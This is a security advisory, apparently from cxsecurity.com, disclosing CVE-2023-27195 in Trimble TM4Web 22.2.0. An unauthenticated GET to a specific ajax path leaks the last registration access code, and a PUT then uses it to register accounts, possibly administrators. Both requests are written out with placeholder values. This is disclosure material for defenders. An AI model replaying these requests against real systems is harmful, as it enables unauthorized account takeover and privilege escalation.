Trimble TM4Web 22.2.0 Privilege Escalation / Access Code Disclosure

2024.04.11
Credit: Clement Cruchet
Risk: High
Local: No
Remote: Yes
CVE: CVE-2023-27195
CWE: CWE-264

CVE ID: CVE-2023-27195 Description: An access control issue in Trimble TM4Web v22.2.0 allows unauthenticated attackers to access a specific crafted URL path to retrieve the last registration access code and use this access code to register a valid account. If the access code was used to create an Administrator account, attackers are also able to register new Administrator accounts with full rights and privileges. Vulnerability Type: Broken Access Control Vendor of Product: Trimble - Transportation (https://transportation.trimble.com/products/TM4Web) Affected Product Code Base: TM4Web v22.2.0 Affected Component: User registration process Attack Type: Remote Impact: Privilege escalation / authentication bypass Attack Vectors:*1. Accessing the last access code * GET /inc/tm_ajax.msw?func=UserfromUUID&uuid= Host: example.host.com *2. Sending PUT request to create a new user account with previously retrieved access code* PUT /inc/tm_ajax.msw Host: example.host.com [...] WEB_UUID=&USERNAME=ccruchet&FIRST_NAME=test&LAST_NAME=test&COMPANY=test&DEPARTMENT=test&ADDRESS1=test&ADDRESS2=test&CITY=test&STATE_CODE=BC&COUNTRY_CODE=CA&POSTAL_CODE=J3L0B8&PHONE=1111111111&PHONE_EXT=&FAX=&EMAIL=test@gmail.com&LANGUAGE=EN&ACCESS_CODE=XXXXXX&pwd1=Password123&pwd2=Password123&isReadonly=false&func=WebUser Discoverer: Clément Cruchet (lutzenfried) References: - Official website: https://transportation.trimble.com/products/TM4Web


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top